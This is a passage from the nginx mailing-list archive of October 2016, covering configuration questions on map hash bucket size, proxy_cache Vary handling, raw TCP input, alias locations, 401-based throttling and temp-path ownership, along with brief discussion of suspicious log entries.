Sat, 22 Oct 2016 12:42:40 -0400 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> Message-ID: <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org> Syntax: map_hash_bucket_size size; Default: map_hash_bucket_size 32|64|128; Context: http The err message is valid but may be misleading due to the places you used, a dup msg does not indicate the valid context area. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270480,270481#msg-270481 From rpaprocki at fearnothingproductions.net Sat Oct 22 16:57:03 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Sat, 22 Oct 2016 09:57:03 -0700 Subject: Suspicious log records In-Reply-To: References: Message-ID: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net> Looks like a shellshock attempt. Provided that you're running a modern of version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit. Welcome to the wild world of running a public server! > On Oct 22, 2016, at 03:19, janro wrote: > > Hi everyone. > > I'm newbie with Nginx and with servers and I thought to ask your opinion > about the log input I noticed from last night. 
> There's clearly a some sort of malicious attempt in access.log which is
> repeated four times. In error.log there's only 'closed keepalive connection'
> records, which matches with those four attempts.
>
> Everything runs fine on server side. I just like to know that is this just a
> normal day in a world of server logs or something critical that need
> actions?
>
> [...]

From lists at ssl-mail.com  Sat Oct 22 17:29:29 2016
From: lists at ssl-mail.com (lists at ssl-mail.com)
Date: Sat, 22 Oct 2016 10:29:29 -0700
Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used?
In-Reply-To: <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org>
References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <1477157369.3014761.764105609.0A017BE4@webmail.messagingengine.com>

On Sat, Oct 22, 2016, at 09:42 AM, itpp2012 wrote:
> Syntax: map_hash_bucket_size size;
> Default: map_hash_bucket_size 32|64|128;
> Context: http
>
> The err message is valid but may be misleading due to the places you used, a
> dup msg does not indicate the valid context area.

Sorry, but ... "Huh?" The 'valid' context per your own post is "http", as it is per the docs:
http://nginx.org/en/docs/http/ngx_http_map_module.html#map_hash_bucket_size
My snippet clearly shows its use in http().

From nginx-forum at forum.nginx.org  Sat Oct 22 20:21:10 2016
From: nginx-forum at forum.nginx.org (janro)
Date: Sat, 22 Oct 2016 16:21:10 -0400
Subject: Suspicious log records
In-Reply-To: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net>
References: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net>
Message-ID:

Thank you for your answer Robert!

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270484#msg-270484

From lists at lazygranch.com  Sat Oct 22 21:19:49 2016
From: lists at lazygranch.com (lists at lazygranch.com)
Date: Sat, 22 Oct 2016 14:19:49 -0700
Subject: Hacker log
Message-ID: <20161022141949.36d31d25@linux-h57q.site>

http://pastebin.com/7W0uDrLa

If you need an extensive list of hacker requests (over 200), I put this log entry on pastebin. As mentioned at the top of the pastebin, the hacker used my IP address directly rather than my domain name.

I have a "map" that detects typical hacker activity. Perhaps in my "map" of triggers, I should look for bypassing of the domain name, that is, requests made directly to my IP address. There is nothing particularly evil in using my IP address rather than the domain name, but would any real user ever use my IP address? Kind of doubtful.

From nginx-forum at forum.nginx.org  Sat Oct 22 21:40:56 2016
From: nginx-forum at forum.nginx.org (itpp2012)
Date: Sat, 22 Oct 2016 17:40:56 -0400
Subject: Hacker log
In-Reply-To: <20161022141949.36d31d25@linux-h57q.site>
References: <20161022141949.36d31d25@linux-h57q.site>
Message-ID:

The idea is nice but pointless, if you maintain this list over 6 months you most likely will end up blocking just about everyone.

Stick to common sense with your config, lock down nginx and the backends, define proper flood and overflow settings for nginx to deal with, anything beyond the scope of nginx should be dealt with by your ISP perimeter systems.
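For reference, the kind of "flood and overflow settings" meant here might look roughly like this (a minimal sketch; the zone names, sizes and rates are illustrative and need tuning per site):

http {
    limit_req_zone  $binary_remote_addr zone=req_per_ip:10m rate=10r/s;
    limit_conn_zone $binary_remote_addr zone=conn_per_ip:10m;

    server {
        listen 80;

        location / {
            # allow short bursts, reject sustained floods
            limit_req  zone=req_per_ip burst=20 nodelay;
            # cap simultaneous connections per client address
            limit_conn conn_per_ip 20;
        }
    }
}

Rejected requests get status 503 by default (configurable via limit_req_status and limit_conn_status).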
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270485,270486#msg-270486 From lists at lazygranch.com Sat Oct 22 22:17:24 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 22 Oct 2016 15:17:24 -0700 Subject: Hacker log In-Reply-To: References: <20161022141949.36d31d25@linux-h57q.site> Message-ID: <20161022151724.5c94ac3f@linux-h57q.site> On Sat, 22 Oct 2016 17:40:56 -0400 "itpp2012" wrote: > The idea is nice but pointless, if you maintain this list over 6 > months you most likely will end up blocking just about everyone. > > Stick to common sense with your config, lock down nginx and the > backends, define proper flood and overflow settings for nginx to deal > with, anything beyond the scope of nginx should be dealt with by your > ISP perimeter systems. > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,270485,270486#msg-270486 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx I've been doing this for more than six months. Clearly I haven't blocked everyone. ;-) These requests would just go to 404 if I didn't trap them. I rather save 404 for real missing links. My attitude regarding hacking is if it comes from a place without eyeballs (hosting, colo, etc.), enjoy your lifetime ban. This keeps the logs cleaner. Dumb hacking attempts like that clown could be some real attack in the future, so better to block them. At the very least, you could block all well known cloud services. AWS for example, but not from email ports. From lucas at lucasrolff.com Mon Oct 24 04:38:25 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 24 Oct 2016 06:38:25 +0200 Subject: Rewrite Vary header before stored in proxy_cache Message-ID: Hi guys, I'm building a small nginx reverse proxy to take care of a bunch of static files for my clients - and it works great. One thing I'm facing though is that some client sites sent "Vary: Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since proxy_cache takes this into account, unless I use something like "proxy_ignore_headers Vary;" But ignoring Vary headers can cause other issues such as gzipped content being sent to a non-gzip client. So I'm looking for a way to basically rewrite the vary header to "Vary: Accept-Encoding" before storing it in proxy_cache - but I wonder if this is even possible in nginx, and if yes - can you give any pointers? I found a temporary fix, and that is to ignore the Vary header, and using a custom variable as a part of the cache key, that is either "", "gzip" or "deflate" (I use a map to look at the Accept-Encoding header from the client). This works great - but I rather keep the cache key a bit clean (since I'll use it later) Do you guys have any recommendations how to make this happen? Also as a side note, if I remove the custom variable from the cache key, how would one actually purge the file then? I assume I have to send different purge requests, since the cached file is based on the Vary: accept-encoding - so I'd have to purge at least the amount of cached encodings right? Also I could opt for another way, and that's always requesting a uncompressed file from the origin (Is it simply not sending the accept-encoding header, or should I do something else?), and then on every request either decide to gzip it or not - the downside I see here, is the fact that most clients request gzip,deflate content, so having to compress on every request will use additional CPU resources. 
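For reference, the map-based "temporary fix" described above presumably looks something like this (a sketch; the variable name is illustrative):

map $http_accept_encoding $ae_variant {
    default    "";
    ~*gzip     gzip;
    ~*deflate  deflate;
}

# the normalised variant becomes part of the key, alongside the usual parts
proxy_cache_key "$scheme$proxy_host$request_uri $ae_variant";

Since regex entries in a map are checked in order, a typical "gzip, deflate" request collapses to the single "gzip" variant.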
Thanks in advance! -- Best regards, Lucas Rolff -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Oct 24 12:20:34 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 24 Oct 2016 15:20:34 +0300 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> Message-ID: <20161024122034.GM73038@mdounin.ru> Hello! On Sat, Oct 22, 2016 at 09:30:21AM -0700, lists at ssl-mail.com wrote: > I have a working nginx/1.11.5 instance, with this in config > > ... > http( > ... > 134 map_hash_bucket_size 4096; > > ... > ) > ... > > when I add geoip blocking > > ... > http ( > + geoip_country /var/lib/GeoIP/GeoIP.dat; > + map $geoip_country_code $allowed_country { > + default yes; > + XX no; # some country > ... > 134 map_hash_bucket_size 4096; > > ... > ) > ... > > config check now reports > > nginx: [emerg] "map_hash_bucket_size" directive is duplicate in /etc/nginx/nginx.conf:134 > > simply commenting out > > - map_hash_bucket_size 4096; > + #map_hash_bucket_size 4096; > > fixes the config error. > > Why can't 'map_hash_bucket_size' be set in the presence of the geoip_country snippet? > > Config error? Bug? other? It's not relevant to geoip_country, but rather to the map{} block before the map_hash_bucket_size directive. Something like map $uri $foo {} map_hash_bucket_size 4096; is enough to trigger the error, as the map{} block requires some hash bucket size to be set. And if it is not set when parsing a map{} block, it is automatically configures bucket size to a default value. An attempt to redefine bucket size later will trigger the error, and this is what happens with the above configuration. The message is a bit misleading in this particular situation as it is a generic one. Though the fact that the configuration is rejected is correct: nginx can't use the value specified in the map_hash_bucket_size directive, and hence it is expected to reject the configuration. An obvious solution would be to specify map_hash_bucket_size before the map{} block, i.e.: map_hash_bucket_size 4096; map $uri $foo {} -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Mon Oct 24 12:49:23 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 24 Oct 2016 15:49:23 +0300 Subject: Rewrite Vary header before stored in proxy_cache In-Reply-To: References: Message-ID: <20161024124923.GN73038@mdounin.ru> Hello! On Mon, Oct 24, 2016 at 06:38:25AM +0200, Lucas Rolff wrote: > Hi guys, > > I'm building a small nginx reverse proxy to take care of a bunch of static > files for my clients - and it works great. > > One thing I'm facing though is that some client sites sent "Vary: > Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since > proxy_cache takes this into account, unless I use something like > "proxy_ignore_headers Vary;" > > But ignoring Vary headers can cause other issues such as gzipped content > being sent to a non-gzip client. > > So I'm looking for a way to basically rewrite the vary header to "Vary: > Accept-Encoding" before storing it in proxy_cache - but I wonder if this is > even possible in nginx, and if yes - can you give any pointers? 
> > I found a temporary fix, and that is to ignore the Vary header, and using a > custom variable as a part of the cache key, that is either "", "gzip" or > "deflate" (I use a map to look at the Accept-Encoding header from the > client). > > This works great - but I rather keep the cache key a bit clean (since I'll > use it later) > > Do you guys have any recommendations how to make this happen? The best possible solution I can think of is to ask the client to fix the Vary header it returns. Using User-Agent in Vary is something one shouldn't use without a very good reason, and if there a reason - it's likely a bad idea to strip from the Vary header. And if there are no reasons, then it shouldn't be returned in the first place. > Also as a side note, if I remove the custom variable from the cache key, > how would one actually purge the file then? I assume I have to send > different purge requests, since the cached file is based on the Vary: > accept-encoding - so I'd have to purge at least the amount of cached > encodings right? When using purge as availalbe in nginx-plus (http://nginx.org/r/proxy_cache_purge), it takes care of removing all cached variants, much like it does for wildcard purge requests. > Also I could opt for another way, and that's always requesting a > uncompressed file from the origin (Is it simply not sending the > accept-encoding header, or should I do something else?), and then on every > request either decide to gzip it or not - the downside I see here, is the > fact that most clients request gzip,deflate content, so having to compress > on every request will use additional CPU resources. This can be done easily, just proxy_set_header Accept-Encoding ""; should be enough. Alternatively, you can use proxy_set_header Accept-Encoding gzip; gunzip on; to always ask gzipped resources and gunzip them when needed, see http://nginx.org/en/docs/http/ngx_http_gunzip_module.html. -- Maxim Dounin http://nginx.org/ From dragon_nat at hotmail.com Mon Oct 24 12:56:44 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Mon, 24 Oct 2016 12:56:44 +0000 Subject: Receive raw data Message-ID: Dear all I have electronic device and I config to send TCP/IP data to my server by raw data no http header. My server use nginx with fastcgi for webserver and develop my application for get message from port 8080. But nginx always response with error 400 with "client sent invalid method while reading client request line". I know cause my electronic device not have correct header in packet. So I try add "ignore_invalid_headers off;" in http scope but not work. I need to bypass raw data to my application. Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Mon Oct 24 15:25:08 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Mon, 24 Oct 2016 17:25:08 +0200 Subject: Receive raw data In-Reply-To: References: Message-ID: Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead. https://nginx.org/en/docs/stream/ngx_stream_core_module.html On Mon, Oct 24, 2016 at 2:56 PM, Nattakorn S wrote: > Dear all > > > I have electronic device and I config to send TCP/IP data to my server by > raw data no http header. > > My server use nginx with fastcgi for webserver and develop > my application for get message from port 8080. > > But nginx always response with error 400 with "client sent invalid method > while reading client request line". 
> > I know cause my electronic device not have correct header in packet. > > So I try add "ignore_invalid_headers off;" in http scope but not work. > > I need to bypass raw data to my application. > > > Thank you. > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at ssl-mail.com Mon Oct 24 16:08:57 2016 From: lists at ssl-mail.com (lists at ssl-mail.com) Date: Mon, 24 Oct 2016 09:08:57 -0700 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <20161024122034.GM73038@mdounin.ru> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> <20161024122034.GM73038@mdounin.ru> Message-ID: <1477325337.1841467.765652673.2B5CD46F@webmail.messagingengine.com> On Mon, Oct 24, 2016, at 05:20 AM, Maxim Dounin wrote: > It's not relevant to geoip_country, but rather to the map{} block > before the map_hash_bucket_size directive. Something like > > map $uri $foo {} > map_hash_bucket_size 4096; > > is enough to trigger the error, as the map{} block requires some > hash bucket size to be set. And if it is not set when parsing a > map{} block, it is automatically configures bucket size to a > default value. An attempt to redefine bucket size later will > trigger the error, and this is what happens with the above > configuration. > > The message is a bit misleading in this particular situation > as it is a generic one. Though the fact that the configuration is > rejected is correct: nginx can't use the value specified in the > map_hash_bucket_size directive, and hence it is expected to reject > the configuration. > > An obvious solution would be to specify map_hash_bucket_size > before the map{} block, i.e.: > > map_hash_bucket_size 4096; > map $uri $foo {} Clearly explained, and the 'solution', of simply ordering the commands as above, works as promised. Once you understand what's going on, "directive is duplicate in" actually makes sense. Curious, did I miss this ^^ fact in the docs somewhere? Obviously not critical, but a more clearly descriptive/relevant error would be nice .... Thanks. From francis at daoine.org Mon Oct 24 17:02:51 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 24 Oct 2016 18:02:51 +0100 Subject: Problem with cache key In-Reply-To: <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> References: <20161018191240.GL11677@daoine.org> <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161024170251.GN11677@daoine.org> On Wed, Oct 19, 2016 at 06:05:54AM -0400, CarstenK. wrote: Hi there, > I took a look at the header nginx response. > Vary: Accept-Encoding > Vary: Accept-Encoding So they both vary based on Accept-Encoding. When I do a quick test of my versions of curl, Chrome, and Firefox, I see no Accept-Encoding header for curl, "gzip, deflate, sdch, br" for Chrome, and "gzip, deflate" for Firefox. Those are three different values, and upstream presumably says that the response depends on the value, so the cached version for one should not be returned in response to another. > How can i have a look for the headers of upstream servers? >From nginx to upstream - you could check the nginx debug log (I think), or the upstream log, or possibly "tcpdump" the traffic to see what exactly is happening. 
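As a lighter-weight alternative to tcpdump, the headers in question can also be written to an ordinary access log (a sketch; the log format name is illustrative):

log_format varydebug '$remote_addr "$http_accept_encoding" '
                     'upstream_vary="$upstream_http_vary" $upstream_cache_status';
access_log /var/log/nginx/vary-debug.log varydebug;

This records each client's Accept-Encoding alongside the Vary header nginx received from upstream and the resulting cache status.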
In this case, it is probably the client request to nginx that is showing the different headers. For that, you could check the nginx debug log, or "tcpdump" that traffic. There is a now-parallel thread at https://forum.nginx.org/read.php?2,270496,270510 which shows a way to "normalise" the Accept-Encoding headers that are sent to upstream. That would be at the cost of (e.g.) not being able to serve sdch- or br-encoded content to the Chrome that asked for it. Cheers, f -- Francis Daly francis at daoine.org From lucas at lucasrolff.com Mon Oct 24 17:25:24 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 24 Oct 2016 19:25:24 +0200 Subject: Rewrite Vary header before stored in proxy_cache In-Reply-To: <20161024124923.GN73038@mdounin.ru> References: <20161024124923.GN73038@mdounin.ru> Message-ID: <580E4404.3030008@lucasrolff.com> Hi Maxim, Thank you a lot for the reply! > The best possible solution I can think of is to ask the client to fix the Vary header it returns I completely agree, but sometimes it's hard to ask customers to do this, but I do try to do it as often as possible. > When using purge as availalbe in nginx-plus (http://nginx.org/r/proxy_cache_purge), it takes care of removing all cached variants, much like it does for wildcard purge requests. Ahh cool! Nice one - maybe we'll be lucky that it gets to the open source version one day ;) > This can be done easily, just > > proxy_set_header Accept-Encoding ""; > > should be enough. Alternatively, you can use > > proxy_set_header Accept-Encoding gzip; > gunzip on; > > to always ask gzipped resources and gunzip them when needed, see > http://nginx.org/en/docs/http/ngx_http_gunzip_module.html. This is actually what I ended up doing, and it seems to work perfectly - still I have to gunzip if the client doesn't support gzip in first place, but the percentage is very minimal these days, so it seems like the best option, not only I save a bunch of storage (due to compression and only storing the file once and not 3 times) - but also makes purging super easy! Once again, thanks a lot! -- Best Regards, Lucas Rolff Maxim Dounin wrote: > Hello! > > On Mon, Oct 24, 2016 at 06:38:25AM +0200, Lucas Rolff wrote: > >> Hi guys, >> >> I'm building a small nginx reverse proxy to take care of a bunch of static >> files for my clients - and it works great. >> >> One thing I'm facing though is that some client sites sent "Vary: >> Accept-Encoding, User-Agent" - which gives an awful cache hit rate - since >> proxy_cache takes this into account, unless I use something like >> "proxy_ignore_headers Vary;" >> >> But ignoring Vary headers can cause other issues such as gzipped content >> being sent to a non-gzip client. >> >> So I'm looking for a way to basically rewrite the vary header to "Vary: >> Accept-Encoding" before storing it in proxy_cache - but I wonder if this is >> even possible in nginx, and if yes - can you give any pointers? >> >> I found a temporary fix, and that is to ignore the Vary header, and using a >> custom variable as a part of the cache key, that is either "", "gzip" or >> "deflate" (I use a map to look at the Accept-Encoding header from the >> client). >> >> This works great - but I rather keep the cache key a bit clean (since I'll >> use it later) >> >> Do you guys have any recommendations how to make this happen? > > The best possible solution I can think of is to ask the client to fix > the Vary header it returns. 
> Using User-Agent in Vary is something
> one shouldn't use without a very good reason, and if there a
> reason - it's likely a bad idea to strip from the Vary header.
> And if there are no reasons, then it shouldn't be returned in the
> first place.

[...]

From nginx-forum at forum.nginx.org  Mon Oct 24 18:42:21 2016
From: nginx-forum at forum.nginx.org (itpp2012)
Date: Mon, 24 Oct 2016 14:42:21 -0400
Subject: Rewrite Vary header before stored in proxy_cache
In-Reply-To: <580E4404.3030008@lucasrolff.com>
References: <580E4404.3030008@lucasrolff.com>
Message-ID:

Lucas Rolff Wrote:
-------------------------------------------------------
> > When using purge as availalbe in nginx-plus
> > (http://nginx.org/r/proxy_cache_purge), it takes care of removing all
> > cached variants, much like it does for wildcard purge requests.
> Ahh cool!
> Nice one - maybe we'll be lucky that it gets to the open
> source version one day ;)

https://github.com/FRiCKLE/ngx_cache_purge/

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270496,270526#msg-270526

From daniel at linux-nerd.de  Mon Oct 24 19:14:27 2016
From: daniel at linux-nerd.de (Daniel)
Date: Mon, 24 Oct 2016 21:14:27 +0200
Subject: alias
Message-ID: <23A13382-F28E-4502-9777-7536512C7931@linux-nerd.de>

Hi there,

I'm trying to set up an alias, but it doesn't seem to work and I don't know why:

server {
    listen 80;
    root /var/www/d1/current/web/;
    server_name localhost;

    location / {
        index app.php;
        add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept";
        add_header Access-Control-Allow-Origin "*";
        if ($request_uri ~* \.(ico|css|js|gif|jpe?g|png|woff)$) {
            expires 0;
            break;
        }
        if (-f $request_filename) {
            break;
        }
        try_files $uri @rewriteapp;
    }

    location @rewriteapp {
        rewrite ^(.*)$ /app.php/$1 last;
    }

    location /en/holidays/shared/images {
        alias /mnt/nfs/uat;
    }

    location ~ ^/proxy\.php(\?|/|$) {
        fastcgi_pass unix:/var/run/php-fpm/php70u-fpm.sock;
        fastcgi_split_path_info ^(.+\.php)(.*)$;
        include fastcgi_params;
        fastcgi_param SCRIPT_NAME $fastcgi_script_name;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
        fastcgi_buffer_size 128k;
        fastcgi_buffers 4 256k;
        fastcgi_busy_buffers_size 256k;
        add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept";
        add_header Access-Control-Allow-Origin "*";
        # Prevents URIs that include the front controller. This will 404:
        # http://domain.tld/app.php/some-path
        # Remove the internal directive to allow URIs like this
        #internal;
    }

    location ~ ^/app\.php(/|$) {
        fastcgi_pass unix:/var/run/php-fpm/php70u-fpm.sock;
        fastcgi_split_path_info ^(.+\.php)(/.*)$;
        include fastcgi_params;
        fastcgi_param SCRIPT_NAME $fastcgi_script_name;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
        fastcgi_buffer_size 128k;
        fastcgi_buffers 4 256k;
        fastcgi_busy_buffers_size 256k;
        add_header Access-Control-Allow-Headers "Origin, X-Requested-With, Content-Type, Accept";
        add_header Access-Control-Allow-Origin "*";
        # Prevents URIs that include the front controller. This will 404:
        # http://domain.tld/app.php/some-path
        # Remove the internal directive to allow URIs like this
        internal;
    }
}

I added exactly this:

location /en/holidays/shared/images {
    alias /mnt/nfs/uat;
}

but nginx tries to open the files from the document root :-(

Does anyone have an idea what it could be?

Cheers
Daniel

From nginx-forum at forum.nginx.org  Tue Oct 25 13:01:56 2016
From: nginx-forum at forum.nginx.org (hide)
Date: Tue, 25 Oct 2016 09:01:56 -0400
Subject: How to delay requests from once unauthorized IP address
Message-ID: <96cb472bc3d4389b9111c37be2ec6296.NginxMailingListEnglish@forum.nginx.org>

Hello!

My Nginx does fastcgi_pass to some CGI application. The CGI application can return HTTP status code 401. I want Nginx to return this status code to the user and then prevent that user's next access to the CGI application for 5 seconds.

For example, the user accessed the CGI application through Nginx and got HTTP status code 401 at 17:40:40.
Suppose that the IP address of the user is trying to access the CGI application through Nginx for the second time at 17:40:42. I want Nginx to provide that this second request will not reach the CGI application. Then the IP address of the user is trying to access the CGI application through Nginx for the third time at 17:40:46. I want Nginx to let this third request go to the CGI application because 5 seconds have already passed. Suppose that this third request has worked successfully with HTTP status code 200. Then the IP address of the user is trying to access the CGI application through Nginx for the fourth time at 17:40:47. I want Nginx to let this fourth request go to the CGI application because 5 seconds from HTTP code 401 have already passed. Can I do this with Nginx? Thank you if you answer. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270537,270537#msg-270537 From obri at chaostreff.ch Tue Oct 25 14:45:34 2016 From: obri at chaostreff.ch (Daniel Aubry) Date: Tue, 25 Oct 2016 16:45:34 +0200 Subject: Bug? Chown of all default *_temp_path directories at startup? Message-ID: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> Hi all I'm using nginx-full 1.10.2-1~dotdeb+8.1 from dotdeb.org on Debian. nginx -V nginx version: nginx/1.10.2 built with OpenSSL 1.0.1t 3 May 2016 TLS SNI support enabled configure arguments: --with-cc-opt='-g -O2 -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-file-aio --with-threads --with-http_addition_module --with-http_geoip_module=dynamic --with-http_gunzip_module --with-http_gzip_static_module --with-http_image_filter_module=dynamic --with-http_secure_link_module --with-http_sub_module --with-http_xslt_module=dynamic --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module --add-dynamic-module=/usr/src/builddir/debian/modules/nginx-auth-pam --add-module=/usr/src/builddir/debian/modules/nginx-dav-ext-module --add-module=/usr/src/builddir/debian/modules/nginx-echo --add-module=/usr/src/builddir/debian/modules/nginx-upstream-fair --add-module=/usr/src/builddir/debian/modules/ngx_http_substitutions_filter_module --add-module=/usr/src/builddir/debian/modules/nginx-cache-purge --add-module=/usr/src/builddir/debian/modules/ngx_http_pinba_module --add-module=/usr/src/builddir/debian/modules/nginx-x-rid-header --with-ld-opt=-lossp-uuid I do have several nginx inscances on one Server, they all run as a different users. There is one main nginx instance which runs as the user www-data. *_temp_path is set to a different location for all nginx instances excluding the main instance. The main www-data instance is still using /var/lib/nginx. 
Configuration example for custom temp dirs: ================================================================ fastcgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/fcgi; scgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/scgi; uwsgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/wsgi; client_body_temp_path /var/www/vhosts/XYZ/tmp/nginx/body; proxy_temp_path /var/www/vhosts/XYZ/tmp/nginx/proxy; ================================================================ Now, let's restart the main nginx. You can see that all files/directories in /var/lib/nginx are owned by www-data:www-data: ================================================================ root at xxxx-web-03:/var/log/nginx# systemctl restart nginx.service root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx total 28 drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. drwx------ 2 www-data www-data 4096 Oct 25 15:03 body drwx------ 2 www-data www-data 4096 Oct 6 14:43 fastcgi drwx------ 9 www-data www-data 4096 Oct 25 10:18 proxy drwx------ 2 www-data www-data 4096 Oct 6 14:43 scgi drwx------ 2 www-data www-data 4096 Oct 6 14:43 uwsgi ================================================================ After restarting nginx-XYZ.service, all files/directories are owned by XYZ: ================================================================ root at xxxx-web-03:/var/log/nginx# systemctl restart nginx-XYZ.service root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx total 28 drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. drwx------ 2 XYZ www-data 4096 Oct 25 15:03 body drwx------ 2 XYZ www-data 4096 Oct 6 14:43 fastcgi drwx------ 9 XYZ www-data 4096 Oct 25 10:18 proxy drwx------ 2 XYZ www-data 4096 Oct 6 14:43 scgi drwx------ 2 XYZ www-data 4096 Oct 6 14:43 uwsgi root at xxxx-web-03:/var/log/nginx# ================================================================ I can't find the string /var/lib/nginx in any nginx Configuration file on the system: ================================================================ root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx-XYZ/ root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx/ root at xxxx-web-03:/var/log/nginx# ================================================================ I can set all *_temp_path directories of the www-data nginx to an other direcory, this is my current workaround for this issue. But i believe that the nginx shouldn't touch /var/lib/ngin/* if this directory isn't in the configuration file. Any idea? Should i open a bug? Best Regards Daniel From mdounin at mdounin.ru Tue Oct 25 15:10:09 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 25 Oct 2016 18:10:09 +0300 Subject: Bug? Chown of all default *_temp_path directories at startup? In-Reply-To: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> References: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> Message-ID: <20161025151009.GW73038@mdounin.ru> Hello! On Tue, Oct 25, 2016 at 04:45:34PM +0200, Daniel Aubry wrote: [...] > I do have several nginx inscances on one Server, they all run as a > different users. > > There is one main nginx instance which runs as the user www-data. > > *_temp_path is set to a different location for all nginx instances > excluding the main instance. The main www-data instance is still > using /var/lib/nginx. 
> > Configuration example for custom temp dirs: > ================================================================ > fastcgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/fcgi; > scgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/scgi; > uwsgi_temp_path /var/www/vhosts/XYZ/tmp/nginx/wsgi; > client_body_temp_path /var/www/vhosts/XYZ/tmp/nginx/body; > proxy_temp_path /var/www/vhosts/XYZ/tmp/nginx/proxy; > ================================================================ > > Now, let's restart the main nginx. You can see that all > files/directories in /var/lib/nginx are owned by www-data:www-data: > ================================================================ > root at xxxx-web-03:/var/log/nginx# systemctl restart nginx.service > root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx > total 28 > drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . > drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. > drwx------ 2 www-data www-data 4096 Oct 25 15:03 body > drwx------ 2 www-data www-data 4096 Oct 6 14:43 fastcgi > drwx------ 9 www-data www-data 4096 Oct 25 10:18 proxy > drwx------ 2 www-data www-data 4096 Oct 6 14:43 scgi > drwx------ 2 www-data www-data 4096 Oct 6 14:43 uwsgi > ================================================================ > > After 